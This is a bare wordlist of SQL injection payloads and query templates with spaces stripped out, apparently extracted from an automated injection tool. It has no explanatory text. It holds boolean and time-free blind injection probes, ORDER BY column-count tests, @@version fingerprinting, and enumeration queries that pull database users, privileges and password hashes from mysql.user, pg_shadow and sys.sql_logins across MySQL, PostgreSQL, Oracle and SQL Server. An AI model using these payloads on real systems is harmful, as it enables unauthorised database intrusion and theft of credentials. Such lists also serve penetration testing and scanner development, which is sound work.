OR1=1
'or1=1
OR1=0
asddsa
ORx=x
ORx=y
OR1=1#
OR1=0#
ORx=x#
ORx=y#
OR1=1--
OR1=0--
ORx=x--
ORx=y--
OR3409=3409AND('pytW'LIKE'pytW
OR3409=3409AND('pytW'LIKE'pytY
HAVING1=1
HAVING1=0
HAVING1=1#
HAVING1=0#
HAVING1=1--
HAVING1=0--
AND1=1
AND1=0
AND1=1--
AND1=0--
AND1=1#
AND1=0#
AND1=1AND'%'='
AND1=0AND'%'='
AND1083=1083AND(1427=1427
AND7506=9091AND(5913=5913
AND1083=1083AND('1427=1427
AND7506=9091AND('5913=5913
AND7300=7300AND'pKlZ'='pKlZ
AND7300=7300AND'pKlZ'='pKlY
AND7300=7300AND('pKlZ'='pKlZ
AND7300=7300AND('pKlZ'='pKlY
ASINJECTXWHERE1=1AND1=1
ASINJECTXWHERE1=1AND1=0
ASINJECTXWHERE1=1AND1=1#
ASINJECTXWHERE1=1AND1=0#
ASINJECTXWHERE1=1AND1=1--
ASINJECTXWHERE1=1AND1=0--
WHERE1=1AND1=1
WHERE1=1AND1=0
WHERE1=1AND1=1#
WHERE1=1AND1=0#
WHERE1=1AND1=1--
WHERE1=1AND1=0--
ORDERBY1--
ORDERBY2--
ORDERBY3--
ORDERBY4--
ORDERBY5--
ORDERBY6--
ORDERBY7--
ORDERBY8--
ORDERBY9--
ORDERBY10--
ORDERBY11--
ORDERBY12--
ORDERBY13--
ORDERBY14--
ORDERBY15--
ORDERBY16--
ORDERBY17--
ORDERBY18--
ORDERBY19--
ORDERBY20--
ORDERBY21--
ORDERBY22--
ORDERBY23--
ORDERBY24--
ORDERBY25--
ORDERBY26--
ORDERBY27--
ORDERBY28--
ORDERBY29--
ORDERBY30--
ORDERBY31337--
ORDERBY1#
ORDERBY2#
ORDERBY3#
ORDERBY4#
ORDERBY5#
ORDERBY6#
ORDERBY7#
ORDERBY8#
ORDERBY9#
ORDERBY10#
ORDERBY11#
ORDERBY12#
ORDERBY13#
ORDERBY14#
ORDERBY15#
ORDERBY16#
ORDERBY17#
ORDERBY18#
ORDERBY19#
ORDERBY20#
ORDERBY21#
ORDERBY22#
ORDERBY23#
ORDERBY24#
ORDERBY25#
ORDERBY26#
ORDERBY27#
ORDERBY28#
ORDERBY29#
ORDERBY30#
ORDERBY31337#
ORDERBY1
ORDERBY2
ORDERBY3
ORDERBY4
ORDERBY5
ORDERBY6
ORDERBY7
ORDERBY8
ORDERBY9
ORDERBY10
ORDERBY11
ORDERBY12
ORDERBY13
ORDERBY14
ORDERBY15
ORDERBY16
ORDERBY17
ORDERBY18
ORDERBY19
ORDERBY20
ORDERBY21
ORDERBY22
ORDERBY23
ORDERBY24
ORDERBY25
ORDERBY26
ORDERBY27
ORDERBY28
ORDERBY29
ORDERBY30
ORDERBY31337
RLIKE(SELECT(CASEWHEN(4346=4346)THEN0x61646d696eELSE0x28END))AND'Txws'='
RLIKE(SELECT(CASEWHEN(4346=4347)THEN0x61646d696eELSE0x28END))AND'Txws'='
IF(7423=7424)SELECT7423ELSEDROPFUNCTIONxcjl--
IF(7423=7423)SELECT7423ELSEDROPFUNCTIONxcjl--
%'AND8310=8310AND'%'='
%'AND8310=8311AND'%'='
and(selectsubstring(@@version,1,1))='X'
and(selectsubstring(@@version,1,1))='M'
and(selectsubstring(@@version,2,1))='i'
and(selectsubstring(@@version,2,1))='y'
and(selectsubstring(@@version,3,1))='c'
and(selectsubstring(@@version,3,1))='S'
and(selectsubstring(@@version,3,1))='X'
CAST(%sASNCHAR)
CHAR_LENGTH(%s)
IFNULL(%s,'')
,
LIMIT%d,%d
ORDERBY%sASC
COUNT(%s)
---
MID((%s),%d,%d)
CONCAT(%s,%s)
SELECT(CASEWHEN(%s)THEN1ELSE0END)
HEX(%s)
ORD(MID((%s),%d,1))>%d
VERSION()
CURRENT_USER()
DATABASE()
@@HOSTNAME
SELECTtable_commentFROMINFORMATION_SCHEMA.TABLESWHEREtable_schema='%s'ANDtable_name='%s'
SELECTcolumn_commentFROMINFORMATION_SCHEMA.COLUMNSWHEREtable_schema='%s'ANDtable_name='%s'ANDcolumn_name='%s'
(SELECTsuper_privFROMmysql.userWHEREuser='%s'LIMIT0,1)='Y'
SELECTgranteeFROMINFORMATION_SCHEMA.USER_PRIVILEGES
SELECTuserFROMmysql.user
SELECTusernameFROMDATA_DICTIONARY.CUMULATIVE_USER_STATS
SELECTDISTINCT(grantee)FROMINFORMATION_SCHEMA.USER_PRIVILEGESLIMIT%d,1
SELECTuser,authentication_stringFROMmysql.user
SELECTgrantee,privilege_typeFROMINFORMATION_SCHEMA.USER_PRIVILEGES
SELECTINFOFROMINFORMATION_SCHEMA.PROCESSLIST
SELECTschema_nameFROMINFORMATION_SCHEMA.SCHEMATA
SELECTDISTINCT(schema_name)FROMINFORMATION_SCHEMA.SCHEMATALIMIT%d,1
SELECTtable_schema,table_nameFROMINFORMATION_SCHEMA.TABLES
SELECTcolumn_name,column_typeFROMINFORMATION_SCHEMA.COLUMNSWHEREtable_name='%s'ANDtable_schema='%s'
SELECT%sFROM%s.%sORDERBY%s
SELECTschemanameFROMpg_tables
SELECTusenameFROMpg_user
SELECTusename,passwdFROMpg_shadow
SELECTUSERNAMEFROMSYS.ALL_USERS
SELECTGRANTEE,PRIVILEGEFROMDBA_SYS_PRIVS
SELECTnameFROMmaster..syslogins
SELECTnameFROMsys.sql_logins
SELECTUSER_NAME()FROMDUAL
SELECTVERSION()FROMV$SQL
